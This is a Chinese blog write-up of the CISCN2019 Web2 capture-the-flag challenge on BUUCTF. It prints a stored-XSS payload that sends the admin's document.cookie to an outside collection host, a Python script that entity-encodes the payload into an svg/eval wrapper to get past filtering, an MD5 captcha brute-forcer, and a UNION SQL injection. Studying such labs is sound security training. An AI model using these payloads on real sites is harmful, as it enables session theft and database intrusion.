[CISCN2019 华东北赛区]Web2

最新推荐文章于 2022-06-27 10:29:45 发布
最新推荐文章于 2022-06-27 10:29:45 发布
阅读量727 收藏
点赞数 1
分类专栏: xss # ctf做题记录 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/116945925
版权

这次ciscn差点爆0了。。。
还是多练练吧。
注册账号登录,看到投稿和反馈两个页面。
除此之外,还有login.php,register.php和admin.php,admin.php访问提示不是管理员
在这里插入图片描述
发表查看
在这里插入图片描述
直接将我们输入的文章内容显示在了页面上,猜测存在xss。
测试
在这里插入图片描述
没有内容也没有弹窗
在这里插入图片描述
看源码
在这里插入图片描述
我们的语句被放入了源码,但似乎被编码了。导致没有执行。
在这里插入图片描述
这个反馈界面应该是模拟管理员点击链接的过程。
思路大概就是通过xss获得管理员的cookie之后访问admin.php
因为对语句过滤,用脚本编码
buuxss平台
xss:

(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=5fZN9o&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();

这里要用window.opener.location刷新网页

xss='''(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=5fZN9o&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();'''
output = ""
for c in xss:
    output += "&#" + str(ord(c))
print("<svg><script>eval&#40&#34" + output + "&#34&#41</script>")

将产生的结果在文章发表界面提交,获得url
http://8d185026-b4a6-4440-86da-322fc04dc474.node3.buuoj.cn/post/1b28ea0e547723ebfb156fd5616f5cee.html
将其改成
http://web.node3.buuoj.cn/post/1b28ea0e547723ebfb156fd5616f5cee.html
之后是要利用一段验证码
在这里插入图片描述

验证码生产脚本(python3)

import hashlib


def function(str1):
    for i in range(999999,9999999):
        md5 = hashlib.md5()
        md5.update(str(i).encode("utf-8")) 
        tomd5 = md5.hexdigest() 
        if tomd5[:6] == str1:
            return str(i)
if __name__ == "__main__":
    print(function("659ad7"))

之后在xss平台获得session
在这里插入图片描述
配合cookie成功访问admin.php之后是一段非常简单的sql注入,无过滤的数字型注入。
最后
admin.php?id=-1 union select 1,flagg,3 from flag
在这里插入图片描述
xss还是不太熟练,虽然知道是xss但还是看了wp才做出来的,得多练练

fmyyy1
关注
专栏目录
BUUCTF-CISCN-东北赛区Web-XSS
迷风小白
09-11 4587
XSS 拿到题目出现如下界面 随便点击测试一下,发现需要注册登录,随即注册一个用户登录(admin用户不能注册) 发现有投稿和反馈这两个页面可以操作 结合标题再看看这两个页面,投稿页面是用来放XSS的,然后在反馈给管理员这样我们就能拿到管理员的cookie,因为这里是内网环境,所以只能去 http://xss.buuoj.cn 注册账号来接收cookie。 经过测试发现提交的内容部分会被转义...
BUUCTF-[CISCN2019 东北赛区]Web2
AndyNoel的博客
05-13 528
BUUCTF-[CISCN2019 东北赛区]Web2 看题 一个论坛,内容不错:) 可以投稿,点击投稿发现要注册,那就先注册登录。随便账号密码就行。 常规操作,扫一下站点,发现有admin.php,进行访问 思路 有session,可以确定一个思路,获取管理员的session得到权限,然后拿到flag 执行 去投稿,发现存在XSS漏洞,但是有一些过滤,''(''被转义成了"(",存在WAF,先转码,然后eval执行JS代码,并且需要一个window.location.href来自动触发刷新页面 使用
BUUCTF:[CISCN2019 东北赛区]Web2
末初的CSDN博客
03-31 2700
BUUCTF:[CISCN2019 东北赛区]Web2 参考:https://blog.csdn.net/weixin_44677409/article/details/100741998 经测试发现存在以下页面: index.php admin.php login.php register.php post.php commitbug.php about.php admin.php没有权限...
[CISCN2019 东南赛区]Web11 1(SSTI,smarty,X-Forwarded-For)
weixin_45577185的博客
10-16 461
知识点: SSTI smarty X-Forwarded-For Smarty是一个PHP的模板引擎,提供让程序逻辑与页面显示 (HTML/CSS)代码分离的功能。对于该框架的SSTI漏洞很多 文章往往只是一笔带过,讲解的重心往往在flask等框架上。 看到这个我就想到了抓包修改XFF试试加入X-Forwarded-For 发现Current IP更改为相应值 回想到曾经做过的题,用SSTI 发现存在注入 获取当前目录有那些文件:X-Forwarded-For:{system(‘ls’)}
BUUCTF:[CISCN2019 东南赛区]Web4 ---- jwt的加密,解密 复习 ---- 一个奇怪的 jwt 的secret方法
Zero_Adam的博客
04-19 942
目录:一、自己做:1.没有思路啦,,2.没有思路啦,,二、学到的&&不足:三、学习WP 一、自己做: **注:**没有思路的地方,就是我看WP的地方。 解解jwt瞅瞅, 有加密的东西,我目前遇到过的jwt解法:弱密钥碰撞,碰撞出密钥来,就可以修改数据了,二:无密钥检测,用python重写一个无验证的jwt,有可能也成功, 再是一个进阶的方法:如果是SA256不对称加密的化,我们没办法破解,但是可以用SH256加密的方法巴拉巴拉给弄出来,没遇到过题,然后懒,,没有细细研究, 我*???,我正
buuctf web [CISCN2019 东南赛区]Web11
qq_40327508的博客
03-11 752
buuctf web [CISCN2019 东南赛区]Web11 进入后页面是这样的 可以通过最低端发现是Smarty SSTI,又从右上角得知是通过ip注入 使用burp构造X-Forwarded-For开始注入 从返回14看出确实存在注入,接下来根据smarty手册返回版本号等 最后读取flag ...
BUUCTF--[CISCN2019 东北赛区]Web2
qq_46263951的博客
07-25 478
进入之后我们看到的是一个blog页面, 随便注册一个账号进入 通过扫描目录发现admin.php,访问后给出以下提示 所以这里我们需要一个admin的cookie 再来看各个页面的作用 投稿:我们输入一段内容,然后会给出显示我们文章内容的链接,这里存在着存储型xss漏洞 反馈:通过提示我们可以知道我们提交反馈的链接admin用户会去访问,所以我们可以通过这里来获取的admin的cookie 大致流程:投稿处提交我们的xss代码--获取代码所在的链接--反馈给admin--获取cookie .
2020/7/17 - [CISCN2019 东北赛区]Web2 - xss、html markup、SQL注入
抒情诗
07-17 330
做一道复杂的题锻炼一下 文章目录1.判断是xss2.盗cookie的payload3.SQL注入获得flag 1.判断是xss 这是一个类似博客的界面,而博客常见的漏洞就是xss,通过让别人浏览或者点击某处盗取身份。 由此处大概能感觉到是xss了,在内网xss平台弄(第二次搞xss,第一次是在pikachu上面弄的)。 2.盗cookie的payload 看了一下wp,因为我对xss并不是很熟悉,他们说要自动触发,需要把payload略改一下,改成下面。 (function(){window.locat
[CISCN2019 赛区 Day2 Web1]Hack World
evil_ming的博客
04-23 125
打开靶机 意思是在flag表里的flag字段,然后需要我们提供id。 先输入列数试试。 1 想什么东西,继续 2 嘛,如果愿意直接给flag我那也不是不能将就的。 3 欧克到这里就不行了。 用bp简单抓个包然后发送到intruder,字典上网搜了些sql常用的字符,跑了一下发现 这些显示482 猜测是布尔盲注 浅学一下 很烦,按照大佬的脚本结果返回Process finished with exit code 1给我,搞了两个小时,暂时放着吧。 ...
[CISCN2019 东北赛区 Day2 Web3]Point System CBC字节翻转攻击
a3320315的博客
02-05 1127
0x01 题目简介 打开是一个登录界面, 访问robots.txt, 发现一个html, 里面是很多api 然后使用postman注册一下 提示注册成功, 但是缺无法登录~~ 提示权限不足~~ 我们看了一下请求 向login发请求后返回的是 {"code":100,"data":{"token":"eyJzaWduZWRfa2V5IjoiU1VONGExTnBibWRFWVc1alpWSmhVSH...
CISCN 赛区 Day1 Web2
kid的博客
06-14 2631
CISCN 赛区 Day1 Web2 前言 关注大佬的博客看到大佬又做了一道有意思的题还提供了环境,这里来体验下。 一看这个网站就很有意思…最近黑kunkun的可真多,前面0708那个漏洞github搜exp,下下来一运行 ,输出你打篮球真的很像CXK…过分…你打篮球才像CXK,你们全家打篮球都像CXK! 复现环境:https://github.com/CTFTraining/CISCN...
BMZCTFCISCN_2019_WEB_1
末初的CSDN博客
02-07 732
http://bmzclub.cn/challenges#CISCN_2019_WEB_1 先熟悉下业务功能,注册登录之后,有个上传文件的地方,然后可以下载或者删除上传的文件 题目这里没有提供源码,自己网上找一下2019CISCN赛区Day1的web题 源码地址:CISCN-2019-Northern-China-Web 文件上传这里并没有看到可以绕过白名单上传shell的方法 审计源码,发现一个file_get_contents() //class.php class File { p
CISCN2019 赛区 Day2 Web1
kid的博客
09-09 1715
CISCN2019 赛区 Day2 Web1 前言 最近太懒一直没有怎么学习,今天把《轮到你了》结局看了也极为失望,作为黑岛的舔狗我决定好好刷题提高自己,不然都没有实力去当舔???? (当好舔????真不容易) 打开大佬的博客发现好多新的题和环境…好吧,一道一道来吧 感谢大佬提供的环境:https://github.com/glzjin/CISCN_2019_northern_China_day2_we...
CISCN分区赛东北部分wp
Htt9999的博客
06-27 791
东北分区赛部分wp
PWN刷题记录(1)--ciscn_2019_n_5
小心信科理化声
05-10 344
这是第一篇的刷题记录,从ret2text开始刷起 0x1 程序分析 先checksec 一下 64位的小端序,NX没开启,妥妥的写shellcode 拖入IDA中查看一下 main函数如下 可以看到gets(text)有明显的溢出 然后还可以看到关键的read函数,可以做libc泄露用,先留着 然后查找一下有没有能用到的system函数和binsh 无system函数 估计也没有binsh了 咋办呢>? 看一下有没有可读可写可执行的字段呢? 看看这里的两个变量:name\text 存在!
攻防世界web高手进阶区-baby web
weixin_61835841的博客
04-19 397
1.进入链接,一开始进去看到这个页面是 1.php,根据题目提示“想想初始页面是哪个,猜测应该存在 index.php,于是访问index.php输入之后直接跳转到了 1.php,猜测地址可能填写到了1.php。 2.打开火狐浏览器开发者模式(F12),选择网络模块,请求index.php,可以看到location参数被设置了1.php,并且得到flag。 总结:本题考查了web常见参数location的作用 ...
赛区智能车竞赛经验总结与资料分享
资源摘要信息:"本资料集合了在第十六届全国大学生智能车竞赛中,赛区单车拉力组获得全国二等奖的设计资料,对有志于参与智能车竞赛的学生具有极高的参考价值。资料内容丰富,包括了参考资料、程序代码、PCB工程...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值